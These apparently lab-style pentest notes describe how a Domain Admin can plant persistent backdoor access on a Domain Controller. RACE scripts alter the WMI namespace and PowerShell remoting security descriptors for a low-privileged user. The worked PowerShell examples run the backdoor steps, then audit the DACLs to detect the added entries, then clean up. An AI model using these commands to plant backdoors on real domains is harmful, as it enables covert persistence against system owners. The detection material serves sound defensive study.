MODIFYING SECURITY DESCRIPTORS

This is a domain persistence technique: with Domain Admin rights you modify the security descriptors (DACLs) of a WMI namespace or of the PowerShell remoting endpoint on a Domain Controller so that a chosen low-privileged user keeps remote access to the DC even after the Domain Admin access is lost.

MODIFYING SECURITY DESCRIPTORS FOR WMI-REMOTING

Needs Domain Admin privileges (i.e. local administrator rights on the DC) to modify the security descriptors

The default WMI namespace is Root/CIMV2

Set-RemoteWMI -UserName <USERNAME> -ComputerName <DC FQDN> -namespace 'root\cimv2'

The specified user gets an ACE in the security descriptor of the root\cimv2 namespace on the Domain Controller (the RACE script also adjusts the DCOM permissions the remote connection needs)

To list all WMI classes in the current namespace (gwmi is the alias for Get-WmiObject):

Get-WmiObject -List

gwmi -List

Executing WMI queries against the Domain Controller (WMI remoting runs over DCOM/RPC, i.e. the HOST and RPCSS services on the target; HOST + RPCSS = WMI):

 # get the list of all accounts known to the DC
 gwmi -Class Win32_Account -ComputerName <DC FQDN>

 # get operating system info
 gwmi -Class Win32_OperatingSystem -ComputerName <DC FQDN>

Because the ACE is stored in the namespace's security descriptor on the DC, it persists until someone removes it; from then on the specified user can run remote WMI queries against the DC without any administrative privileges.
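Worked example of the whole WMI flow, added here and not part of the original notes or of the RACE toolkit: the Domain Admin step, the check from the low-privileged account, and an audit function that reads the namespace DACL through the __SystemSecurity class and decodes each ACE, so a defender (or the attacker verifying the backdoor) can see the added entry. The DC FQDN and user name are placeholders, the script path assumes RACE's Set-RemoteWMI.ps1 is in the current directory, and the -Remove switch used for cleanup is assumed from the RACE toolkit rather than taken from this page; the access-mask constants are the WMI SDK values.

```powershell
# Added example, not from the original notes or the RACE toolkit.
# Assumptions: Set-RemoteWMI.ps1 (RACE) is in the current directory; -Remove is RACE's
# cleanup switch (assumed, check the script); the DC FQDN and user are placeholders.
$dc   = 'dcorp-dc.dollarcorp.moneycorp.local'   # placeholder DC FQDN
$user = 'student1'                              # placeholder low-privileged domain user

# --- Step 1, run as Domain Admin: add an ACE for $user on the DC's root\cimv2 namespace ---
. .\Set-RemoteWMI.ps1
Set-RemoteWMI -UserName $user -ComputerName $dc -namespace 'root\cimv2' -Verbose

# --- Step 2, run as $user (no admin rights): remote WMI against the DC now works ---
gwmi -Class Win32_OperatingSystem -ComputerName $dc |
    Select-Object CSName, Caption, LastBootUpTime
# SIDType 1 = user accounts (Win32_Account also returns groups and well-known SIDs)
gwmi -Class Win32_Account -ComputerName $dc -Filter 'SIDType=1' |
    Select-Object Name, SID

# --- Step 3, audit (needs admin on the DC): read the namespace DACL and decode each ACE ---
# WMI namespace access-mask bits (WMI SDK names; the wmimgmt.msc labels are in the comments).
$WmiRights = [ordered]@{
    0x00001 = 'WBEM_ENABLE'             # Enable Account
    0x00002 = 'WBEM_METHOD_EXECUTE'     # Execute Methods
    0x00004 = 'WBEM_FULL_WRITE_REP'     # Full Write
    0x00008 = 'WBEM_PARTIAL_WRITE_REP'  # Partial Write
    0x00010 = 'WBEM_WRITE_PROVIDER'     # Provider Write
    0x00020 = 'WBEM_REMOTE_ACCESS'      # Remote Enable: required for any remote query
    0x20000 = 'READ_CONTROL'            # Read Security
    0x40000 = 'WRITE_DAC'               # Edit Security
}

function Get-WmiNamespaceAcl {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [string]$Namespace = 'root\cimv2'
    )
    # __SystemSecurity exposes the namespace security descriptor via GetSecurityDescriptor().
    $sec = Get-WmiObject -Namespace $Namespace -Class __SystemSecurity -ComputerName $ComputerName
    $sd  = $sec.GetSecurityDescriptor().Descriptor
    foreach ($ace in $sd.DACL) {
        $names = foreach ($bit in $WmiRights.Keys) {
            if ($ace.AccessMask -band $bit) { $WmiRights[$bit] }
        }
        [pscustomobject]@{
            Trustee    = '{0}\{1}' -f $ace.Trustee.Domain, $ace.Trustee.Name
            SID        = $ace.Trustee.SIDString
            Type       = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
            AccessMask = '0x{0:X5}' -f $ace.AccessMask
            Rights     = $names -join ', '
        }
    }
}

# By default only BUILTIN\Administrators holds Remote Enable on root\cimv2; any other
# trustee holding it is a candidate backdoor (the ACE added in step 1 shows up here).
Get-WmiNamespaceAcl -ComputerName $dc |
    Where-Object { $_.Rights -match 'WBEM_REMOTE_ACCESS' -and $_.Trustee -notmatch '\\Administrators$' } |
    Format-Table -AutoSize

# --- Cleanup, run as Domain Admin ---
Set-RemoteWMI -UserName $user -ComputerName $dc -namespace 'root\cimv2' -Remove -Verbose
```

Step 3 is the check worth keeping: Remote Enable (0x20) is the bit a remote caller needs, so listing every non-Administrators trustee that holds it on root\cimv2 (and on other namespaces the attacker may have chosen) surfaces this persistence without knowing the user name in advance.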

MODIFYING SECURITY DESCRIPTORS FOR PS-REMOTING

Needs Domain Admin privileges (i.e. local administrator rights on the DC) to modify the security descriptors

Set-RemotePSRemoting -UserName <USERNAME> -ComputerName <DC FQDN>

(In some cases an "I/O operation" error is shown; it can be ignored, the change is still applied)

The specified user has to log off and log on again before the change takes effect

The specified user is added to the security descriptor (SDDL) of the Domain Controller's PowerShell remoting endpoint and can open remote PowerShell sessions to it:

 Invoke-Command -ComputerName <DC FQDN> -ScriptBlock {whoami;hostname}

Because the entry is stored in the remoting endpoint's security descriptor on the DC, it persists until someone removes it; from then on the specified user can run commands on the DC through PS-Remoting without any administrative privileges (the commands still execute under that user's own, unprivileged token).
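Worked example of the PS-Remoting flow, added here and not part of the original notes or of the RACE toolkit: the Domain Admin step, the access check from the low-privileged account, and an audit that compares each remoting endpoint's Permission list against the default principals so the added account stands out. The DC FQDN and user name are placeholders, the script path assumes RACE's Set-RemotePSRemoting.ps1 is in the current directory, and the -Remove switch used for cleanup is assumed from the RACE toolkit rather than taken from this page.

```powershell
# Added example, not from the original notes or the RACE toolkit.
# Assumptions: Set-RemotePSRemoting.ps1 (RACE) is in the current directory; -Remove is RACE's
# cleanup switch (assumed, check the script); the DC FQDN and user are placeholders.
$dc   = 'dcorp-dc.dollarcorp.moneycorp.local'   # placeholder DC FQDN
$user = 'student1'                              # placeholder low-privileged domain user

# --- Step 1, run as Domain Admin: add $user to the DC's PowerShell remoting endpoint ACL ---
. .\Set-RemotePSRemoting.ps1
Set-RemotePSRemoting -UserName $user -ComputerName $dc -Verbose
# The "I/O operation" error the notes mention can be ignored.

# --- Step 2, run as $user after logging off and on again: the user can now remote into the DC ---
Invoke-Command -ComputerName $dc -ScriptBlock { whoami; hostname }
$s = New-PSSession -ComputerName $dc
# Remoting access is not admin access: the token on the DC is still the unprivileged user's.
Invoke-Command -Session $s -ScriptBlock { whoami /groups }
Remove-PSSession $s

# --- Step 3, audit (needs admin on the DC): who is allowed on each remoting endpoint? ---
# The default Microsoft.PowerShell endpoint allows exactly these three principals; other
# built-in endpoints allow a subset of them, so anything else is worth a look.
$DefaultEndpointPrincipals = @(
    'NT AUTHORITY\INTERACTIVE',
    'BUILTIN\Administrators',
    'BUILTIN\Remote Management Users'
)

function Get-PSRemotingEndpointAcl {
    param([Parameter(Mandatory)][string]$ComputerName)
    # Get-PSSessionConfiguration has no -ComputerName, so run it inside a remote session.
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Get-PSSessionConfiguration | Select-Object Name, Permission, SecurityDescriptorSddl
    }
}

function Find-ExtraRemotingPrincipals {
    param([Parameter(Mandatory)][string]$ComputerName)
    foreach ($ep in Get-PSRemotingEndpointAcl -ComputerName $ComputerName) {
        # Permission is a string such as
        # "BUILTIN\Administrators AccessAllowed, dcorp\student1 AccessAllowed"
        foreach ($entry in ($ep.Permission -split ',\s*')) {
            $principal = ($entry -replace '\s+Access(Allowed|Denied)$', '').Trim()
            if ($principal -and $DefaultEndpointPrincipals -notcontains $principal) {
                [pscustomobject]@{
                    Endpoint  = $ep.Name
                    Principal = $principal
                    Entry     = $entry
                    Sddl      = $ep.SecurityDescriptorSddl
                }
            }
        }
    }
}

# The account added in step 1 shows up here as an extra AccessAllowed principal.
Find-ExtraRemotingPrincipals -ComputerName $dc | Format-List

# --- Cleanup, run as Domain Admin ---
Set-RemotePSRemoting -UserName $user -ComputerName $dc -Remove -Verbose
```

The audit deliberately keys on the Permission string rather than the raw SDDL because it already resolves SIDs to names; keep the SecurityDescriptorSddl in the output anyway, since a deleted account or an unresolvable SID appears there even when the Permission text looks clean.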
